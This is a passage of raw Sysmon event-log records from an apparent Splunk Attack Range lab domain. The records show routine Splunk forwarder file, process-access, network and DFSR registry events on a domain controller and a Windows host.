Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=730D5DD25BD6F71B6737857C5465E2C9,SHA256=328E53BD5689B250467F12FC822D5170848284D3E11A168D0FC7374322B30C0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:48.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E120EF29D27ACC41B6CE80B4969695FF,SHA256=B86A4C1220CE5A2FCB0B99AF96FDDE371851F0440788D4B0F8CA1BDDAEFDCBCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:48.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00F0766E215A29EC8D1E4E7029A4F1BB,SHA256=CA11BBC5E07BC51FDEF1B0DC4739FE072FBF8F652C167597016D525B7DC12DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:48.522{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB29099507875B52017FEBF13CEDE2C2,SHA256=54796EB19D5BE72E490285C57AA57888B367880402B63069203BAD835820BA7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:46.239{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57150-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:49.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9131F5B7319B6E2979A7B16D2A2ACDC6,SHA256=8BB0A45D6B362E1E197C91DE3AE9285EE4A73EFD4D96602B870C7ACD34AB4CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:49.028{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87E8D6A35C79A165918410427F8E9447,SHA256=31D57C8EC53D8DBCB33F1D95AB1D3C9F0E51FF938E03C78A3FAEDD288008C495,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001045856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:50.866{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001045855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:50.866{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001045854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:50.866{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume 
Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001045853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:50.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.851{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.835{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.836{466BC892-F2B6-60EB-E77C-00000000CF01}8008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.566{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD91BCF0D8DD72C4800AF155F2F9B3B,SHA256=5ABCB6271580CDA110B9B288E13672BAF050460EEEC024664013BD42703A43E5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:50.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=548BCFBE6A609715F1F1AF972A56C0AB,SHA256=7B529115423F1A475CFC4726A393674A03E8EC1E12A50C03798CD2308DC6D0F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.367{466BC892-F2B6-60EB-E67C-00000000CF01}98884212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.167{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.152{466BC892-F2B6-60EB-E67C-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001045835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:41.594{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50896-false10.0.1.12-8000- 354300x80000000000000001045869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.409{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50897-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001045868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.408{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50897-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001045867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.735{466BC892-F2B7-60EB-E87C-00000000CF01}65044136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.567{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABADA92348ED8C99392F85336B493BC3,SHA256=82AC2930D9E1F3E9F8F42BBDE23DC20760BB82BCB50B701232B234B331370FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:51.059{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AB1412BE5079D5E36E7288A7F4DFE0E,SHA256=8ACBBE561FEAD60DB4245CF79B73A0485C62E9DF4CDB477272674FCA42A437D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.536{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001045864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 